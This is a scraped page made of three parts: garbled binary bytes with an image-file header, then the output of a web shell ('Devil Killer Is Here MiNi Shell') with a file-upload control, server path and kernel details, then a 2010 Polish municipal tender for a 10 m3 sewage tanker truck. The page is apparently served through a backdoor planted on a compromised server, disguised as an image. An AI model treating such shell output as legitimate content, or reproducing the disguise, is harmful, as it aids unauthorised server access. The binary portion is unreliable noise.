JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101115/323241-N-2010.html

<p class="kh_header"><b>Pniewy: Dostawa wozu asenizacyjnego o pojemności zbiornika 10m3 w ramach budowy sieci kanalizacji sanitarnej we wschodniej części gminy Pniewy- etap III Koszanowo- Lubosina</b><br>
<b>Numer ogłoszenia: 323241 - 2010; data zamieszczenia: 15.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Pniewy , ul. Dworcowa 37, 62-045 Pniewy, woj. wielkopolskie, tel. 061 2938601, faks 061 2910097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pniewy.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wozu asenizacyjnego o pojemności zbiornika 10m3 w ramach budowy sieci kanalizacji sanitarnej we wschodniej części gminy Pniewy- etap III Koszanowo- Lubosina.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa samochodu asenizacyjnego o pojemności zbiornika 10m3 na podwoziu samochodowym w ramach budowy kanalizacji sanitarnej we wschodniej części gminy Pniewy- etap III Koszanowo- Lubosina. 
Silnik Diesel 
Moc maksymalna: silnika min. 370 KM
Urządzenie ułatwiające zimą rozruch silnika.
Emisja spalin EURO 5.
System oczyszczania spalin SCR z wtryskiem AdBlue sterowanym elektronicznie.
Płyn niezamarzający chłodnicy : do -40 stopni C.
Poziom hałasu - 80 dB A.
Ograniczenie mocy silnika o 40% jeżeli emisja spalin przekracza wartości określone w normie. Dyrektywy UE
PRZYSTAWKA ODBIORU MOCY
Przystawka odbioru mocy  3 wyjścia
- pierwsze wyjście kierunek jak silnik: 
wielowypust do pompy. 
Moment 1000 Nm.  
Przełożenia: 0,6 ; 0,77 , 0,77 ; 0,98 
- drugie wyjście mieszane przeciwnie do silnika: 
Kołnierz DIN 120 i wielowypust do pompy, obroty przeciwne do silnika. 
Moment 550 Nm.  
- trzecie wyjście dowolne
Przełożenie: 1,3 ; 1,65 ; 1,65 ; 2,02 
MOST TYLNY
Blokada mechanizmu różnicowego kół, możliwość włączenia przy niskiej prędkości.
UKŁAD KIEROWNICZY
Układ wspomagania hydraulicznego
OSIE
OŚ PRZEDNIA:
Nośność osi przedniej : min. 7,5 t.
OŚ TYLNA:
2 oś bliźniacza napędowa
3 os pojedyncza skrętna 
Mostu tylnego : min. 11,5 t 
- Osi tylnej : min. 7,5 t.
KOŁA I OPONY
G.295, 80 R 22,5 
Opony z bieżnikiem agresywnym przystosowanym do jazdy w trudnym terenie.
Stalowe Obręcze.
Koło zapasowe mocowane prowizorycznie z podnośnikiem.
UKŁAD HAMULCOWY
- ABS. 
- System kontroli momentu kontrola momentu silnika przy zwalnianiu 
- Sterowanie włączeniem blokady mechanizmu różnicowego do 10 kmh .  
- Wspomaganie hamowania awaryjnego.  
- Alarmy działania hamulców. 
- Połączenie działania zwalniaczy i hamulca zasadniczego.  
- System antypoślizgowy.
- Wspomaganie startu pod górę . 
- Wyrównanie zużycia klocków.
Regulacja :
Samoczynne kasowanie luzu okładzin ciernych.
KABINA Z  ZEWNĄTRZ :
Szkielet kabiny z blachy cynkowanej galwanicznie i zabezpieczanej antykorozyjnie metodą kataforezy.
Kabina krótka do 1,6 m
Odchylanie kabiny hydraulicznie.
2 podgrzewane, zdalnie sterowane lusterka wsteczne.
Szerokokątne lusterko wsteczne.
Lusterko rampowe. 
Lusterko przed szybą przednią
Wywietrznik dachowy.
Wkłady przeciwrozbryzgowe zgodne z normą UE..  
Szyba tylna.
2 pomarańczowe, obrotowe światła ostrzegawcze.
WEWNĄTRZ :
Dach standardowy z półkami nad szybą: 
- min. 2 schowki 50 l.
- Schowki otwarte, zamykane siatką.
Izolacja akustyczna kabiny.
Fotel pneumatyczny ze zintegrowanym pasem bezpieczeństwa i zagłówkiem.
Dwa fotele pasażerskie z pasami bezpieczeństwa
Kieszenie w drzwiach. 
Tachograf cyfrowy.
Instrukcja obsługi pojazdu w języku polskim.
TABLICA PRZYRZĄDÓW :
Elektroniczna deska rozdzielcza z :  
- prędkościomierzem , zegarem, temperaturą zewnętrzną.  
- wyświetlaniem informacji dotyczących prowadzenia. 
- informacje alarmowe dla kierowcy i różne menu. 
Wskaźniki analogowe:  
- centralny obrotomierz ze strefą ekonomiczną, poziom paliwa, ciśnienie powietrza, temperatury płynu chłodzącego. 
- lampki kontrolne i ostrzegawcze. 
- podwójne kontrolki kierunkowskazów
- dostęp do menu sterownikiem radia. 
Kluczyk z blokadą rozruchu silnika.
Stopniowe gaszenie światła w kabinie. 
Pilot centralnego zamka
Sterowanie odwodnieniem układu zasilania.
WYPOSAŻENIE PRZY KIEROWNICY:
Kierownica 4-ramienna  regulowana w dwóch płaszczyznach.
2. dwubiegowe wycieraczki ze zintegrowanym spryskiwaczem szyby z cyklem pracy przerywanej.
Sterowanie oświetleniem drogowym.
WYPOSAŻENIE ELEKTRYCZNE
Akumulator min.  225 Ah.
Alternator min. 130 A.
Napięcie 24V z 2 akumulatorów. 
Wyłącznik główny. 
Oświetlenie zgodne z wytycznymi UE.
ZAWIESZENIE
Z przodu:
Przednie, paraboliczne resory piórowe 8 ton.
Stabilizator.
Z tyłu:
Zawieszenie tylne pneumatyczne. 
Skok zawieszenia min.  250 mm.
Stabilizator osi tylnej.
Nośność tylnego zawieszenia min 13 t.
Amortyzatory teleskopowe.
ZBIORNIK PALIWA
Stalowy zbiornik główny.
Zbiornik główny pojemności : min 300 litrów  
Korek zamykany kluczykiem.
Podgrzewacz paliwa .
AdBlue:
Zbiornik AdBlue min. 40 l z tworzywa.
Korek zamykany kluczykiem.
WYPOSAŻENIE STANDARDOWE
Elektroniczny ogranicznik prędkości 90 km godz.
Pionowy układ wydechowy.
System oczyszczania spalin.
Zestaw narzędzi.
Brzęczyk biegu wstecznego

Cysterna asenizacyjna współpracująca z urządzeniem hakowym:
-Dwukomorowy zbiornik stalowy z otwieraną mechanicznie tylną dennicą o pojemność całkowita cysterny min. 10,5 m3:
-Pojemność na ścieki 10,0 m3
-Pojemność na czysta wodę min. 0,5 m3
-Kompresor  490m3h do 510m3h chłodzony powietrzem, przystosowany do pracy ciągłej.
-System mycia składający się z pistoletu, węża 0,5 o długości min. 60m, zwijadła z napędem hydraulicznym i pompy wodnej min. 36l  min , 150 bar.
-Potrójny system zaworów odcinających zabezpieczający kompresor przed zalaniem
-Zawór klapowy sterowanych pneumatycznie zabezpieczający w czasie jazdy kompresor przed zalaniem 
-Dwa filtry powietrza
-Zespół przygotowania powietrza składający się z:
Bloku zaworowego,
Filtra powietrza z automatycznym odwadnianiem
Regulatorem ciśnienia
Smarowniczki
-Odstojnik chroniący przed zalaniem kompresora o pojemności min. 50 litrów
-Zbiornik ożebrowany, blacha gr. min. 6 mm
-Zbiornik wyposażony w min. trzy falochrony.
-Manowakuometr i zawór bezpieczeństwa
-Płynowskaz rurowy
-Sterowanie urządzenia ręczne i elektropneumatyczne
-Przyłącza do węży średnicy 110 mm
-Zawór spustowy sterowany elektro-pneumatycznie z kabiny kierowcy obsługiwany przez jedną osobę
-Zbiornik mocowany do platformy podhakowej współpracującej z urządzeniem hakowym
-Napęd kompresora od hydrauliki urządzenia hakowego poprzez szybkozłącza
-Dwa koryta na węże wykonane z blachy aluminiowej
-Max podciśnienie -0,09 MPa
-Max głębokość  ssania 12 mb
-Producent cysterny musi posiadać wdrożony i certyfikowany system zarządzania jakością ISO - kopia certyfikatu załączona do oferty.
-Wąż ssawny o średnicy 110mm i długości 7m - szt.2
-Komplet kluczy
-Oświetlenie ostrzegawcze
-Instrukcje obsługi + karty gwarancyjne
-Dokumenty do rejestracji
-Gwarancja na zabudowę min. 24 miesiące.
Urządzenie hakowe:
Parametry techniczne T20-6200
Dopuszczalna masa całkowita pojazdu	Min. 26 t
Udźwig urządzenia moc załadunkowa	Min. 20 t
Długość całkowita urządzenia Min. 6.475 mm
Wysokość haka wg DIN 30722 1.570 mm
Zabezpieczenie haka mechaniczna zapadka 
Przedział długości obsługiwanych kontenerów5.100¸7.000mm
Sterowanie urządzeniem hakowym z kabiny elektryczne pilotem na przewodzie umożliwiającym sterowanie na zewnątrz
Sterowanie urządzeniem hakowym z zewnątrz ręczne z lewej strony, z tyłu urządzenia, elektryczne pilotem na przewodzie min. 2,0 m 
Zabezpieczenie kontenerahydrauliczne zewnętrzne
Zabezpieczenie tylnego zawieszeniatylna rolka podporowa
Urządzenie spełnia wymogi Dyrektywy Maszyn 98,37,CE
Urządzenie hakowe współdziałające z kontenerami typu KP7
-ZAMAWIAJĄCY WYMAGA GWARANCJI NA ZABUDOWĘ CYSTERNY WSPÓŁPRACUJĄCEJ Z URZĄDZENIEM HAKOWYM WRAZ Z CYSTERNĄ 
I URZĄDZENIEM HAKOWYM - NIE MNIEJ NIŻ 24 MIESIĄCE.
-ZAMAWIAJĄCY WYMAGA GWARANCJI NA POJAZD - GWARANCJA PRODUCENTA, NIE MNIEJ NIŻ 24 MIESIĄCE.  
-MIEJSCE DOSTAWY: OCZYSZCZALNIA ŚCIEKÓW W PNIEWACH 
UL. STRZELECKA, 62-045 PNIEWY.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.11.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY WYMAGA WNIESIENIA WADIUM W WYSOKOŚCI 10.000,00 ZŁ
WADIUM NALEŻY WNIEŚĆ PRZED UPŁYWEM TERMINU SKŁADANIA OFERT, PRZY CZYM WNIESIENIE WADIUM W PIENIĄDZU ZA POMOCĄ PRZELEWU BANKOWEGO ZAMAWIAJĄCY BĘDZIE UWAŻAŁ ZA SKUTECZNE TYLKO WÓWCZAS, GDY BANK PROWADZĄCY RACHUNEK ZAMAWIAJĄCEGO POTWIERDZI, ŻE OTRZYMAŁ TAKI PRZELEW PRZED UPŁYWEM TERMINU SKŁADANIA OFERT, 
Wadium, zgodnie z art. 45 ustawy Prawo zamówień publicznych Dz. U. z 2007r. nr 223, poz. 1655 oraz z 2008 r. Nr 171, poz. 1058, może być wnoszone w:
1 pieniądzu;
2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3 gwarancjach bankowych;
4 gwarancjach ubezpieczeniowych;
5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007 r. Nr 42, poz. 275
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy nr:  04 9072 0002 0500 1007 2000 0014
Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Pzp. Zamawiający może żądać ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 3 ustawy Pzp, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana, jako najkorzystniejsza. W takim przypadku Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 1 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik nr 2 do niniejszej SIWZ w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą spełnić następujące warunki, w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie wykażą się posiadaniem wiedzy i doświadczenia, tj.: wykażą, że: wykonał dostawę co najmniej 4 nowych samochodów asenizacyjnych lub samochodów dwufunkcyjnych do mycia sieci kanalizacyjnej mycie ciśnieniowe 
i odsysanie o minimalnej pojemności całkowitej zbiornika 5 000 litrów każdy. Dostawy musza być wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie.
W celu potwierdzenia spełnienia niniejszego warunku, Wykonawcy zobowiązani są przedłożyć wykaz zrealizowanych dostaw według wykazu stanowiącego Załącznik Nr 4 do SIWZ - Wykaz dostaw, oraz dokumenty potwierdzające, że te dostawy zostały wykonane należycie referencje.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik Nr 2 do niniejszej SIWZ w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik Nr 2 do niniejszej SIWZ w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 4 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik Nr 2 do niniejszej SIWZ w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień zawartej umowy.
1.Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy.
2.Zamawiający, przewiduje również następujące możliwości dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1.Zmiany terminu realizacji przedmiotu umowy:  
a.wyjątkowo niesprzyjających warunkach atmosferycznych uniemożliwiających wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej obowiązujących przepisów,
c.zmiany będące następstwem działania organów administracji: zmiana obowiązujących przepisów jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego
2.Zmiany osobowe:
a.zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnym doświadczeniem 
